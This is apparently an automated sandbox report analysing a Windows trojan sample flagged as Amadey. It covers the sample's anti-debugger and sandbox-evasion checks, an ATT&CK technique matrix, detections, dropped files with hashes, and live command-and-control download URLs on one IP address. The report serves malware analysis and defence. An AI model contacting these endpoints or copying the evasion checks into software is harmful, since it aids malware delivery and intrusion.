Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\4kahanaK78.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: NTICE
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: SICE
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30A3 rdtsc 0_2_00AA30A3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF2A6F mov eax, dword ptr fs:[00000030h]0_3_04CF2A6F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CEE30D mov eax, dword ptr fs:[00000030h]0_3_04CEE30D
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00D890A3 push dword ptr fs:[00000030h]0_2_00D890A3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]0_2_04B40D90
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h]0_2_04B538D6
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]0_2_04B4092B
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h]0_2_04B4F174
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B4913C
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B49A19
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B49BB0 SetUnhandledExceptionFilter,0_2_04B49BB0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4C31A
Source: 4kahanaK78.exe, 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: bUProgram Manager
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CE8DB3 cpuid 0_3_04CE8DB3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory681
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync213
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
4kahanaK78.exe61%ReversingLabsWin32.Trojan.Amadey
4kahanaK78.exe100%AviraHEUR/AGEN.1320706
4kahanaK78.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
    		unknown
    http://185.156.73.23/dll/downloadfalse
      		unknown
      http://185.156.73.23/files/downloadfalse
        		unknown
        http://185.156.73.23/dll/keyfalse
          		unknown
          http://185.156.73.23/soft/downloadfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://185.156.73.23/files/downloadpData4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://185.156.73.23/files/downloadpwT4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://185.156.73.23/files/downloadvwR4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.156.73.23/soft/downloadv94kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.73.23/soft/downloadL94kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.156.73.23/dll/key84kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://upx.sf.netAmcache.hve.6.drfalse
                          		high
                          http://185.156.73.23/files/downloadw$4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.156.73.23/files/downloadhw4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.156.73.23H4kahanaK78.exe, 00000000.00000002.3309317789.00000000055AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.156.73.23
                                  		unknownRussian Federation
                                  		48817RELDAS-NETRUfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578915
                                  Start date and time:2024-12-20 16:36:01 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 8s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:4kahanaK78.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:3c2e26d10fa55af2e913120df3b7eddb.exe
                                  Detection:MAL
                                  Classification:mal100.evad.winEXE@2/10@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.43, 4.245.163.56, 20.190.159.4
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: 4kahanaK78.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  10:37:40API Interceptor938318x Sleep call for process: 4kahanaK78.exe modified
                                  10:38:57API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.156.73.237JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23/soft/download
                                  dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23/soft/download
                                  zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23/soft/download
                                  8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23/soft/download
                                  BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23/soft/download

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  RELDAS-NETRU7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23
                                  dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23
                                  zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23
                                  8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23
                                  BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                  • 185.156.73.23
                                  beacon.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 185.156.73.37

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4kahanaK78.exe_6d43c461272fc1c33e968542f2b68fef347c3518_9820f8ad_7d1715aa-ce51-4bc9-9664-557d1a0bf58a\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9436064750316326
                                  Encrypted:false
                                  SSDEEP:96:XBvwzjKUIc1sFThNFx7YjSYQXIDcQzc6EwcEcAcw3Jz69+HbHg/8BRTf3Oy1oVay:5vQ1I0N3qA9jjudUzuiFwZ24IO8e
                                  MD5:DB0F2D6FAEB55C86B39096C59AC84CB3
                                  SHA1:54552FD65842252D6889CCB3E008031102005F76
                                  SHA-256:6BB8142C915B17D41E5ACA1D38482D61BC98B03A60DEEE08DC5CA217E25A7167
                                  SHA-512:95372DA1580C4A8589C58572E9A2D1E91BB7AEF2914C7EFB5C3A0A73FF3F54F6E86B8BF631DF161879DA09685BC07114B0025CEABFE55AA55D9B319551E9581E
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.2.7.1.1.1.5.9.4.6.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.2.7.1.1.6.9.0.7.1.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.1.7.1.5.a.a.-.c.e.5.1.-.4.b.c.9.-.9.6.6.4.-.5.5.7.d.1.a.0.b.f.5.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.a.f.1.e.f.8.-.d.f.8.4.-.4.f.6.7.-.a.2.5.3.-.9.6.6.e.1.0.2.b.3.8.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.k.a.h.a.n.a.K.7.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.0.-.0.0.0.1.-.0.0.1.4.-.d.2.e.6.-.2.b.0.8.f.5.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.7.8.e.3.6.e.f.5.e.3.4.8.0.7.a.c.5.5.e.7.6.9.b.7.8.d.8.4.c.2.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.6.b.a.8.c.6.3.7.8.d.4.4.6.1.6.d.7.1.9.6.3.3.1.c.6.e.a.5.4.e.2.8.6.1.3.6.c.e.6.!.4.k.a.h.a.n.a.K.7.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6B1.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:38:31 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):43034
                                  Entropy (8bit):2.55704812188654
                                  Encrypted:false
                                  SSDEEP:192:Yubx2Xcz4LwQX+FOioGx9H+4osdrEsyPjrxMCTcQrhLHlFYeBqES/qe0p1c:z/z4sjoPG3+4osHyWtgNFFXW/qq
                                  MD5:9C7612D1678A30D99AFA0261BD29356B
                                  SHA1:268F4ED9321E6BBAD28C0EADEA730AC59C120600
                                  SHA-256:FD09AE6C0A590BAFB53FDE5291198325600AE7E00DA2D28239E58AB48ADFCD92
                                  SHA-512:21361B88A359402C3260D32ED7FE3418D2F77CA3C4E83D26A6A9CEE5DCD0A3587EB26E21921660E36013E99F17A61F5F70EE85CD5E0D2EBD6731CDF1CBE885B5
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP..a..... .......w.eg............4...............<.......D....)..........T.......8...........T............9..bn......................................................................................................eJ......p.......GenuineIntel............T....... ...%.eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC79C.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8394
                                  Entropy (8bit):3.692209903934503
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJiu6yj6YEIrSU9FgmfyGGpDj89bC1sfw2m:R6lXJj6u6YEUSU9FgmfyeCOfo
                                  MD5:99CC121510D915F0C364B1AB175EB7AF
                                  SHA1:1083159D09373DEE18D04BF2D670928419DDEDD4
                                  SHA-256:CBE7DDF476C22F8F585A7DFF537E298E1CF49CD7AD09B0B87B6688BDFE788FFE
                                  SHA-512:2FC52956DC2B5A97F245DAB7318F2EACFEC736A5153D75574C5F086A99C7F837C5C38F442B4282D13291E2523191BBE1776D350C92C4870E20C90D69B214FB8A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.8.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7CC.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4680
                                  Entropy (8bit):4.439858664342186
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zs2rJg77aI92hWpW8VYgYm8M4JQBF9C+q8vlu501zysd:uIjfWI7kw7VUJ4CKq01zysd
                                  MD5:F47ACFE7314D0A95585FCB03C18E7132
                                  SHA1:B0E1DC8A726B0974A22628C7512F9059799B852E
                                  SHA-256:4E904906C967EF448EA99E6B6EABD43B5785005B637DD8D1BE1F3CE4CC5D85DB
                                  SHA-512:6A1D7D7372901754375946FC7DD7F50556211995AB20694AB38D75E2312A135DB1A67EFDC1216DE53717EC316B059CB7F9B8F5E7D5B539F124B114593058E2D9
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639761" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\fuckingdllENCR[1].dll

                                  Download File
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):97296
                                  Entropy (8bit):7.9982317718947025
                                  Encrypted:true
                                  SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                  MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                  SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                  SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                  SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\key[1].htm

                                  Download File
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):21
                                  Entropy (8bit):3.880179922675737
                                  Encrypted:false
                                  SSDEEP:3:gFsR0GOWW:gyRhI
                                  MD5:408E94319D97609B8E768415873D5A14
                                  SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                  SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                  SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:9tKiK3bsYm4fMuK47Pk3s

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\download[1].htm

                                  Download File
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htm

                                  Download File
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\download[1].htm

                                  Download File
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
